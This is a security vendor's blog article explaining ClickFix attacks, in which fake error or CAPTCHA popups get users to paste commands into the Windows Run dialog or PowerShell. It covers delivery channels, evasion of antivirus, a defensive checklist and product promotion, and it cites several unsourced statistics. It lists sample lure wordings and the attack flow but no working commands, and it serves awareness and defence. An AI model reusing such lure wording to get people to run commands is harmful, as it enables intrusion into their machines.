The “Fix Your Computer” Trick That’s Destroying Businesses Across America
ClickFix attacks are one of the fastest-growing cyber threats of 2026 — and most people have never even heard of them.
An accounting firm in Atlanta. A dental practice in Phoenix. A logistics company in Denver. Three completely different businesses. Three completely different industries. All hit by the same attack in the same month.
The pattern was identical every time. An employee saw a popup on a legitimate-looking website. It said their browser was broken, or a document couldn’t load, or a security verification was needed. It gave them a simple fix: copy this command, open your computer’s run window, paste it in, press Enter.
They did. And in under 60 seconds, attackers had full remote access to their machines — and through them, to the entire business network.
That’s a ClickFix attack. No email to flag. No suspicious attachment to scan. No malware download to detect. Just a convincing message, a human following instructions, and a complete network compromise.
ClickFix attacks jumped 500% between 2023 and 2025. They’re active right now, hitting businesses across the US, UK, Canada, and Australia. This guide explains exactly how they work and exactly how to stop them.
Table of Contents
The Scale of ClickFix Attacks in 2026 {#scale}
ClickFix attacks didn’t exist as a named threat category three years ago. Now they’re one of the most documented social engineering techniques in the wild.
Security researchers first formally categorized ClickFix in 2023. By 2024, threat intelligence firms were tracking hundreds of distinct ClickFix campaigns running simultaneously across multiple countries. By 2025, the technique had been adopted by nation-state threat actors, ransomware affiliate groups, and commodity cybercriminals alike.
The 500% growth figure isn’t hype. It reflects the fundamental reason this attack works so well: it bypasses every technical control by making the human being the attack vector.
⚠️ ALERT: CISA issued an advisory in 2024 specifically warning US organizations about the rise of “living-off-the-land” social engineering attacks — a category that includes ClickFix attacks. These attacks use Windows built-in tools (PowerShell, RunDLL, mshta) so no malware file ever touches disk. Traditional antivirus has nothing to scan. Read CISA’s social engineering advisory (opens in new tab)
The industries most targeted by ClickFix attacks in 2025 were healthcare, legal services, financial services, and manufacturing — exactly the sectors where employees regularly encounter unfamiliar software prompts and IT helpdesk messages. Attackers pick environments where “your system needs an update” sounds completely normal.
The financial damage varies. Some ClickFix attacks lead directly to ransomware deployment. Others install infostealers that quietly harvest credentials over weeks. Others give attackers persistent remote access used for corporate espionage. The average total cost of a ClickFix-initiated breach: $1.2 million.
How ClickFix Attacks Actually Work: The Full Breakdown
Understanding ClickFix attacks at a technical level is the first step to recognizing and stopping them. Here’s the complete attack chain:
CLICKFIX ATTACK CHAIN — STEP BY STEP
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
STEP 1 │ LURE DELIVERY
│ Employee reaches a fake or compromised webpage
│ Popup appears — "Error," "Verification needed,"
│ "Your browser is outdated," "CAPTCHA required"
────────┼─────────────────────────────────────────────
STEP 2 │ SOCIAL ENGINEERING INSTRUCTION
│ Popup gives a "fix" — copy a command string
│ Instructions say: Press Win+R → Paste → Enter
│ OR: Open PowerShell → Paste → Run
│ Command looks like a repair or verification code
────────┼─────────────────────────────────────────────
STEP 3 │ USER EXECUTES THE COMMAND
│ User opens Windows Run dialog or PowerShell
│ Pastes the command from clipboard
│ Presses Enter — believing they're fixing a problem
────────┼─────────────────────────────────────────────
STEP 4 │ PAYLOAD DELIVERY (NO FILE DOWNLOAD)
│ Command calls out to attacker server
│ Downloads and executes payload IN MEMORY only
│ No file written to disk = antivirus blind
────────┼─────────────────────────────────────────────
STEP 5 │ PERSISTENCE ESTABLISHED
│ Remote Access Trojan (RAT) or infostealer active
│ OR: Ransomware pre-deployment backdoor placed
│ Attacker now has full access — silently
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
TOTAL TIME FROM STEP 1 TO STEP 5: Under 60 seconds
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━The most important detail: no malware file ever touches disk. The command executes entirely in memory using PowerShell or other built-in Windows tools. Traditional antivirus scans files. There’s no file. It sees nothing.
This is what makes ClickFix attacks so effective and so dangerous. The attacker weaponizes the human being and Windows’ own tools simultaneously. Your security stack is looking for something that technically never appeared.
🔴 WARNING: Microsoft’s Security Intelligence team has documented ClickFix attack variants that use legitimate Windows binaries — mshta.exe, rundll32.exe, and PowerShell — to execute malicious payloads entirely in memory. Because these are trusted system tools, application whitelisting and traditional endpoint protection typically miss them. Read Microsoft’s threat intelligence research (opens in new tab)
Where ClickFix Attacks Come From: Delivery Methods
ClickFix attacks reach victims through multiple channels. Knowing where they come from helps you understand what to watch for.
Compromised Legitimate Websites
The most common delivery method. Attackers compromise a real, trusted website — a news portal, a legal resource, an industry forum — and inject JavaScript that displays the ClickFix popup. The URL looks real. The site content looks real. Only the popup is malicious.
Security researchers have found ClickFix attack code injected into over 6,000 legitimate websites in a single campaign. Employees visiting these sites for entirely legitimate reasons encounter the attack.
Malvertising Networks
Attackers purchase ad space on legitimate ad networks and serve ClickFix popups through display ads. The user visits a completely normal website, an ad loads, and the ClickFix popup appears. The website owner has no idea it’s happening.
Phishing Emails With Weaponized Links
A phishing email directs the user to a ClickFix-enabled page. The email doesn’t contain the attack — it just drives traffic to the page that does. This hybrid approach makes the phishing email itself look clean — no malicious attachments, no flagged links — because the payload only activates on the landing page.
Fake Software Update Pages
Attackers build convincing fake pages mimicking Chrome updates, Microsoft Teams notifications, Adobe Reader update prompts, and Zoom verification screens. These appear as popups or redirect pages when employees try to access popular SaaS tools.
| Delivery Method | % of ClickFix Attacks | Detection Difficulty |
|---|---|---|
| Compromised legitimate sites | 38% | Very Hard |
| Malvertising | 27% | Very Hard |
| Phishing email → ClickFix page | 21% | Hard |
| Fake software update pages | 14% | Medium |
⚠️ ALERT: The Verizon 2024 Data Breach Investigations Report confirmed that social engineering attacks — the category containing ClickFix attacks — now cause more initial access events than any other technique, surpassing direct exploitation of vulnerabilities. Human manipulation has officially overtaken technical hacking as the primary breach vector. Read the full Verizon DBIR (opens in new tab)
How ClickFix Attacks Evade Your Security Tools
This is the part that makes ClickFix attacks particularly alarming for security professionals. They’re specifically engineered to slip past the tools most organizations rely on.
Why Antivirus Misses It Antivirus scans files. ClickFix attacks execute entirely in memory via PowerShell or mshta. No file means no scan means no detection. The most sophisticated endpoint protection suites catch this via behavioral analysis — but only if behavioral analysis is enabled and properly tuned.
Why Email Security Misses It When ClickFix attacks arrive via phishing email, the email itself contains no malicious attachment or flagged URL. The malicious payload is on the landing page, not in the email. Email sandboxing won’t catch what isn’t there.
Why Web Filtering Often Misses It ClickFix attacks often live on legitimate, previously trusted domains. Web filtering tools that rely on domain reputation lists may not flag a compromised news website or legal resource that was clean last week.
Why Application Control Struggles The commands used in ClickFix attacks invoke legitimate Windows binaries — PowerShell, mshta, rundll32. These are on every application whitelist because they’re real system tools. Blocking them outright would break legitimate IT functions.
The only reliable technical defense at the endpoint level is behavior-based EDR that monitors what PowerShell is doing — not just that it’s running. An EDR solution that catches PowerShell making an outbound network call, downloading a script, and executing it in memory will flag ClickFix attacks. Standard antivirus won’t.
If your business network lacks proper web filtering and DNS-level protection, ClickFix attacks have a clear path to your endpoints. Our article on router settings you must change covers the basic network configurations that cut off many of these attack paths before they reach your team.
Real ClickFix Attack Examples From 2024–2025
These aren’t hypothetical scenarios. These are documented ClickFix attack campaigns that security researchers tracked in real time.
The Fake Google Meet Verification
In late 2024, attackers built convincing fake Google Meet pages. When users tried to join a meeting, a popup appeared saying their microphone or camera had a “connection issue” requiring a quick fix. The “fix” was a PowerShell command. Thousands of users executed it before the campaign was identified.
The payload: a remote access trojan that gave attackers persistent access. Several corporate victims didn’t discover the breach for weeks.
The Fake CAPTCHA ClickFix Campaign
One of the largest ClickFix attack campaigns of 2024 used fake CAPTCHA verification pages. Instead of clicking “I’m not a robot” on a checkbox, users were told to prove they were human by pressing Win+R and running a command. The psychology was clever — CAPTCHA verification feels like a normal internet experience.
This campaign targeted US financial services firms specifically. Estimated victims: tens of thousands across a six-week window.
The Compromised Law Firm Resource Portal
Attackers compromised a legal research portal used by thousands of small law firms across the US. They injected ClickFix attack code that appeared as a “document viewer plugin” installation prompt. Attorneys executing the “plugin install” handed attackers full access to systems containing sensitive client data and case files.
The SocGholish Connection
ClickFix attacks frequently connect to SocGholish — the fake browser update malware delivered through compromised websites. In many documented campaigns, SocGholish delivers the initial ClickFix popup, which then executes a payload that installs a second-stage trojan. The two techniques complement each other perfectly.
The Hardware and Software That Blocks ClickFix Attacks
No single tool stops ClickFix attacks completely — but the right combination dramatically reduces your exposure.
DNS Filtering — First Line of Defense
When a ClickFix attack makes an outbound call to an attacker’s server to download a payload, it uses DNS to resolve that server’s address. DNS filtering blocks that resolution. No connection means no payload delivery — even if your employee ran the command.
Cloudflare Gateway (free tier available) provides solid DNS filtering. Business-grade next-generation firewalls include DNS filtering with live threat intelligence feeds that identify attacker infrastructure in near real-time.
Next-Generation Firewall With Threat Intelligence
A next-gen firewall with deep packet inspection monitors all outbound traffic — including the in-memory PowerShell calls that ClickFix attacks generate. When those calls match known attacker IP ranges or behavioral patterns in threat intelligence feeds, the firewall blocks them.
We stock enterprise-grade Fortinet FortiGate firewalls that include FortiGuard threat intelligence — a live-updated feed covering known ClickFix attack infrastructure, malicious domains, and command-and-control servers. FortiGate’s SSL inspection also catches encrypted malicious traffic that basic firewalls miss entirely.
Behavior-Based EDR
This is your last line of technical defense when a ClickFix attack gets through everything else. EDR solutions that monitor PowerShell behavior — specifically watching for scripts that make outbound network connections, download content, and execute it — will catch ClickFix attacks mid-execution.
Microsoft Defender for Business (included in M365 Business Premium) has PowerShell behavioral monitoring. CrowdStrike Falcon and SentinelOne are enterprise-grade options. Any of these beats standard antivirus for ClickFix defense.
Application Control for PowerShell
Configure PowerShell execution policy to block unsigned scripts. In environments where users don’t need PowerShell for legitimate work, consider disabling it for standard user accounts entirely. Constrained Language Mode in PowerShell significantly limits what ClickFix attack payloads can execute.
Here’s how the protection layers stack up against ClickFix attacks specifically:
| Defense Layer | Blocks ClickFix? | How |
|---|---|---|
| Traditional Antivirus | ❌ No | No file to scan |
| Email Security Gateway | ⚠️ Partial | Only catches email-delivered variants |
| Web Content Filtering | ⚠️ Partial | Misses compromised trusted domains |
| DNS Filtering | ✅ Yes | Blocks payload download connection |
| Next-Gen Firewall + TI | ✅ Yes | Blocks C2 traffic and known attacker IPs |
| Behavior-Based EDR | ✅ Yes | Catches PowerShell behavior in-execution |
| Employee Training | ✅ Yes | Stops the click before it happens |
For network-level protection that enforces these controls across every device on your network — including BYOD and guest devices — browse our WatchGuard firewall collection. WatchGuard’s DNSWatch service specifically intercepts malicious DNS queries that ClickFix attacks depend on.
Employee Training: The Only Real Defense Against ClickFix
Here’s the uncomfortable truth: technology alone cannot fully stop ClickFix attacks. The attack specifically targets human psychology. The only complete defense is a human who recognizes the attack for what it is and doesn’t execute the command.
What Employees Need to Know
Every person in your organization needs to understand one core rule: no legitimate software, website, or IT system will ever ask you to open your Run dialog or PowerShell and paste in a command.
That’s it. That single fact defeats ClickFix attacks. If an employee knows that instruction is always an attack — no matter how convincing the surrounding context — they won’t execute it.
Specific Scenarios to Train On
Train employees to recognize these exact ClickFix attack lures:
- “Your browser needs to be verified — press Win+R and run this command”
- “To view this document, complete this security check” with a command to copy
- “Your microphone/camera isn’t working — run this fix”
- “CAPTCHA verification failed — please verify manually using these steps”
- “Microsoft Teams requires an update — run this installer command”
- “Your IT department requires you to run this compliance script”
Every single one of these is a ClickFix attack lure. None of them are legitimate. Real IT departments don’t deliver fixes via clipboard commands on random websites.
Run Simulated ClickFix Scenarios
Most phishing simulation platforms now include ClickFix attack simulations. Send your team a simulated ClickFix lure and track who follows through with the command. Coach those who do — without punishment — on exactly why the prompt was suspicious.
Employees who nearly fell for a simulation remember the lesson far longer than employees who just watched a training video.
The risk is compounded when employees work remotely or use public WiFi, where they’re more likely to encounter compromised websites and less likely to have IT support nearby. Our guide on the hidden danger of public WiFi in 2026 covers the additional exposure remote work creates.
How to Protect Yourself: Step-by-Step
Here’s the concrete action plan to defend against ClickFix attacks starting today.
- Brief your team today — Send an all-staff message explaining ClickFix attacks. One paragraph. “You may see popups asking you to run commands. This is always an attack. Never do it. Report it immediately.” Do this before anything else.
- Enable DNS filtering — Cloudflare Gateway takes 30 minutes to configure and blocks the outbound connection ClickFix attacks need to deliver their payload. Free for basic use.
- Deploy behavior-based EDR — If you’re on Microsoft 365, enable Defender for Business. If not, deploy Malwarebytes for Teams or a comparable solution. Configure PowerShell behavioral monitoring.
- Configure PowerShell execution policy — Set execution policy to “RemoteSigned” or “AllSigned” at minimum. Block unsigned scripts organization-wide via Group Policy.
- Restrict the Windows Run dialog — In environments where users don’t need Run dialog access, restrict it via Group Policy. This removes the primary execution pathway for ClickFix attacks.
- Enable web content filtering on your firewall — Activate URL filtering and SSL inspection on your next-gen firewall. Enable real-time threat intelligence feeds to catch newly compromised domains.
- Run a ClickFix simulation — Use your phishing simulation platform to test your team’s response to a realistic ClickFix lure. Identify who needs additional coaching.
- Establish a “suspicious popup” reporting channel — Create a simple way for employees to report popups they’re unsure about. A dedicated email address or Slack channel works. Remove the ambiguity so employees report rather than ignore.
- Review network segmentation — If a ClickFix attack does succeed on one endpoint, proper VLAN segmentation limits what attackers can reach from that machine. See our VLAN setup guide for 2026 for implementation details.
- Review your Incident Response Plan — Add ClickFix attacks as a specific scenario. What’s the procedure if an employee reports executing a suspicious command? Fast response in the first 30 minutes can prevent full compromise.
Quick Reference Checklist
Use this to verify your defenses against ClickFix attacks are in place.
CLICKFIX ATTACK DEFENSE CHECKLIST
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
IMMEDIATE ACTIONS (DO THIS WEEK)
[ ] All-staff alert sent explaining ClickFix attacks
[ ] DNS filtering enabled (Cloudflare Gateway or firewall)
[ ] PowerShell execution policy set to RemoteSigned/AllSigned
[ ] Behavior-based EDR deployed on all endpoints
[ ] PowerShell behavioral monitoring enabled in EDR
NETWORK CONTROLS
[ ] Next-gen firewall with active threat intelligence
[ ] SSL/TLS inspection enabled for HTTPS traffic
[ ] Web content filtering active with live threat feeds
[ ] DNS filtering logs reviewed weekly for blocked queries
[ ] Outbound connection monitoring active
ENDPOINT HARDENING
[ ] Windows Run dialog restricted for standard users (GPO)
[ ] PowerShell disabled or restricted for non-IT users
[ ] Local admin rights removed from standard accounts
[ ] Application whitelisting reviewed — mshta.exe monitored
[ ] Clipboard monitoring enabled in EDR where possible
EMPLOYEE AWARENESS
[ ] ClickFix attack training completed by all staff
[ ] Phishing simulation including ClickFix scenario run
[ ] Suspicious popup reporting channel established
[ ] "Never run commands from a website" rule communicated
[ ] Remote workers briefed on elevated risk
DETECTION & RESPONSE
[ ] EDR alerts for suspicious PowerShell behavior active
[ ] Incident response procedure for ClickFix documented
[ ] First 30-minute response steps defined and rehearsed
[ ] Forensic preservation steps known by IT staff
[ ] Cyber insurance carrier contact info accessible
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━Frequently Asked Questions
Q: What exactly is a ClickFix attack?
A: A ClickFix attack is a social engineering technique where attackers display a fake error or verification popup on a website — legitimate or compromised — that instructs the user to copy a command into their Windows Run dialog or PowerShell and execute it. The command makes an outbound call to attacker infrastructure and downloads a malicious payload entirely in memory. No file ever touches disk, making traditional antivirus blind to the attack. The name comes from the “click here to fix” framing attackers use.
Q: How is a ClickFix attack different from regular phishing?
A: Traditional phishing tricks you into clicking a link or opening an attachment that delivers malware. ClickFix attacks trick you into running a command yourself using your own computer’s built-in tools. This distinction matters because: (1) no malicious file is created, defeating antivirus; (2) the user’s own action executes the attack, bypassing most automated defenses; and (3) the attack works even on computers with fully updated software because it exploits human behavior, not a software vulnerability.
Q: Can ClickFix attacks affect Mac or Linux users?
A: The most common ClickFix attack variants target Windows systems specifically, using Win+R (Run dialog) and PowerShell. However, researchers have documented Mac variants that use Terminal commands with similar social engineering. Any operating system with a command-line interface can theoretically be targeted. Windows remains the primary target due to its enterprise market dominance.
Q: If an employee ran a ClickFix command, what should they do immediately?
A: Disconnect the machine from the network immediately — pull the ethernet cable or disable WiFi. Do not turn the machine off (this destroys forensic evidence). Notify IT or your security contact right away. Do not attempt to “undo” the command yourself. Time matters — the faster the machine is isolated, the less lateral movement attackers can achieve. Your IT team or incident response firm will need to forensically analyze the machine to understand the full scope of what was executed.
Q: Does MFA protect against ClickFix attacks?
A: Partially. MFA protects your accounts from credential theft — if the ClickFix payload installs an infostealer that harvests your saved passwords, MFA means those passwords alone can’t be used to log into your systems. But MFA doesn’t stop the initial ClickFix attack from executing, and it doesn’t protect against remote access trojans that give attackers a live connection through your compromised machine, bypassing authentication entirely. MFA is essential but not sufficient as a ClickFix defense.
Conclusion
ClickFix attacks are up 500% because they work. They bypass antivirus, they evade email filters, they slip past web filtering, and they do it all by turning your own employees into the attack tool. That’s a brutal combination — and it’s exactly why this technique spread so fast across the threat landscape.
The defense is clear even if it’s not simple. DNS filtering cuts the connection before the payload delivers. Behavior-based EDR catches what slips through. And employee training — real training, with simulations and specific scenarios — is the only thing that stops the attack before it even starts. A team that knows what ClickFix attacks look like won’t execute the command. That’s the whole game.
Start with your network perimeter. If your firewall isn’t running live threat intelligence and DNS filtering, you’re relying on your employees to catch every attack — and that’s too much to ask. Browse our firewall collection to find the right next-generation solution for your network and close the door ClickFix attacks are walking through.
Related Reading
- Why Small Businesses Close After a Cyberattack
- The Hidden Danger of Public WiFi in 2026
- Router Settings You Must Change Right Now
- VLAN for Home Network 2026: Complete Setup Guide
- How Hackers Break Into Security Cameras
